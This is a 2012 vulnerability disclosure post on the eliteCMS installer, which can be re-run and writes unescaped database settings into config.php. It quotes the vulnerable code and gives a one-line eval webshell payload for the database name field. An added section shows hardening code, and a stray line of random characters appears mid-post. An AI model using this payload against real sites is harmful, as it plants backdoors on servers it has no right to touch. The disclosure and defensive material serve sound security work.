eliteCMS installer not locked after installation + one-line webshell write vulnerability

Posted on 2012-11-18 13:59:27
After installation finishes, the eliteCMS installer is never locked, so an attacker can revisit the installer URL and run the installation again.

A second issue is that the installer writes attacker-controlled values straight into admin/includes/config.php, which allows a one-line webshell to be written into that file.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    // Step 4 of the installer: generate admin/includes/config.php
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // The session values are interpolated into PHP source as-is, with no escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The generated source is written straight to disk
    $writer = fopen($file, 'w');
...
& B4 l. M" K6 V2 B/ P. s
Now look at where those session values come from:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are stored without any validation at all.
If the database name POST field is set to:

"?><?php eval($_POST[c]);?><?php

the string is interpolated into the define() call, closes the quoted string and the PHP block, and a one-line backdoor ends up written into /admin/includes/config.php.
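The following is an added example, not eliteCMS's own code, showing how the step-4 config writer in the post could be hardened against both issues described above: an install.lock check so the installer cannot be re-run, allow-list validation of the database settings, serialisation with var_export() so a value can never break out of its string literal, and a tokenizer-based sanity check that refuses to write a config containing more than one PHP open tag or an eval(). The lock-file path, the validation patterns and all function names are assumptions made for this illustration.

```php
<?php
// Added example, not eliteCMS's own code: a hardened replacement for the
// installer's step-4 config writer. The install.lock path, the validation
// rules and the function names are assumptions for this illustration.

// Lock check: refuse to run the installer again once it has completed.
function installer_is_locked(string $lockFile): bool
{
    return file_exists($lockFile);
}

function lock_installer(string $lockFile): void
{
    file_put_contents($lockFile, "installed " . date('c') . "\n");
}

// Validation: hypothetical allow-lists for host, database and user names.
// Passwords may contain anything except a NUL byte.
function validate_db_setting(string $name, string $value): string
{
    $patterns = [
        'DB_SERVER' => '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/',
        'DB_NAME'   => '/^[A-Za-z0-9_]{1,64}$/',
        'DB_USER'   => '/^[A-Za-z0-9_.\-]{1,32}$/',
    ];
    if (isset($patterns[$name]) && !preg_match($patterns[$name], $value)) {
        throw new InvalidArgumentException("invalid value for $name");
    }
    if (strpos($value, "\0") !== false) {
        throw new InvalidArgumentException("NUL byte in $name");
    }
    return $value;
}

// Safe serialisation: var_export() emits a single-quoted PHP literal with
// backslashes and quotes escaped, so "?>" or '"' inside a value stays data.
function build_config(array $settings): string
{
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_db_setting($key, (string) ($settings[$key] ?? ''));
        $out .= 'define(' . var_export($key, true) . ', ' . var_export($value, true) . ");\n";
    }
    return $out;
}

// Sanity check before writing: the generated file must contain exactly one
// PHP open tag and no eval(). A second open tag means a value escaped its string.
function config_is_sane(string $source): bool
{
    $openTags = 0;
    foreach (token_get_all($source) as $token) {
        if (!is_array($token)) {
            continue;
        }
        if ($token[0] === T_OPEN_TAG) {
            $openTags++;
        } elseif ($token[0] === T_EVAL) {
            return false;
        }
    }
    return $openTags === 1;
}

// The original writer's pattern, trimmed to one line, for comparison.
function build_config_unsafe(array $settings): string
{
    return "<?php\ndefine(\"DB_NAME\", \"{$settings['DB_NAME']}\");\n";
}

// Constructed input: the payload quoted in the post, supplied as DB_NAME.
$payload = '"?><?php eval($_POST[c]);?><?php';

// The unsafe writer produces a second <?php block, which the sanity check flags.
var_dump(config_is_sane(build_config_unsafe(['DB_NAME' => $payload])));

// The hardened writer rejects the payload as a database name.
try {
    build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => $payload,
                  'DB_USER' => 'root', 'DB_PASS' => 'secret']);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// Passwords are not allow-listed, so the same payload reaches the writer;
// var_export keeps it an inert string literal and the sanity check passes.
$config = build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => 'elite',
                        'DB_USER' => 'root', 'DB_PASS' => $payload]);
var_dump(config_is_sane($config));
echo $config;

// Installer entry flow (lock path is an assumption):
$lockFile = __DIR__ . '/install.lock';
if (installer_is_locked($lockFile)) {
    http_response_code(403);
    exit("installer is locked\n");
}
// ... collect and validate the settings, then:
// file_put_contents('../admin/includes/config.php', $config, LOCK_EX);
// lock_installer($lockFile);
```

The allow-lists are the first line of defence, but the var_export() step is what makes the write safe even for fields like the password that cannot be restricted, because the attacker's bytes are emitted inside an escaped single-quoted literal rather than interpolated into the source text. The token_get_all() check is a cheap defence in depth: any value that did manage to close the string would show up as an extra T_OPEN_TAG before the file touches disk.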